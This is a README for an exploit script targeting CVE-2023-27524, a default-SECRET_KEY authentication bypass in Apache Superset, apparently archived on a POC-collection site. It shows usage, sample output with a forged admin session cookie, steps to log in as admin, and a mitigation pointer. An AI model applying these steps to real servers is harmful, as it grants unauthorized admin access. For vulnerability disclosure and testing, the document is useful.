A POC for the all new CVE-2023-27524 which allows for authentication bypass and gaining access to the admin dashboard.
# CVE-2023-27524: Apache Superset Auth Bypass
Script to check if an Apache Superset server is vulnerable to (CVE-2023-27524) and if it is vulnerable then, forge a session cookie with the `user_id = 1` which is usually the `admin`
user allowing for authentication bypass and gaining access to the dashboard. Currently, there are about 3000 servers world-wide running Apache Superset.
## Usage
usage: python3 CVE-2023-27524.py --url URL
## Basic Example
% python3 CVE-2023-27524.py --url
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
## Mitigations
Follow the [instructions here](https://superset.apache.org/docs/installation/configuring-superset/) to generate and configure a Flask SECRET_KEY. The `superset` CLI tool can be used to [rotate the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation) so that existing database connection information is preserved.
## Disclaimer
This POC is created for educational purpose only
## Reference
* https://github.com/horizon3ai/CVE-2023-27524
* https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
[4.0K] /data/pocs/42e331d575d2d9df207418a5affdcd0749e85246
├── [3.1K] CVE-2023-27524.py
├── [1.0K] LICENSE
├── [1.9K] README.md
└── [ 39] requirements.txt
0 directories, 4 files
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。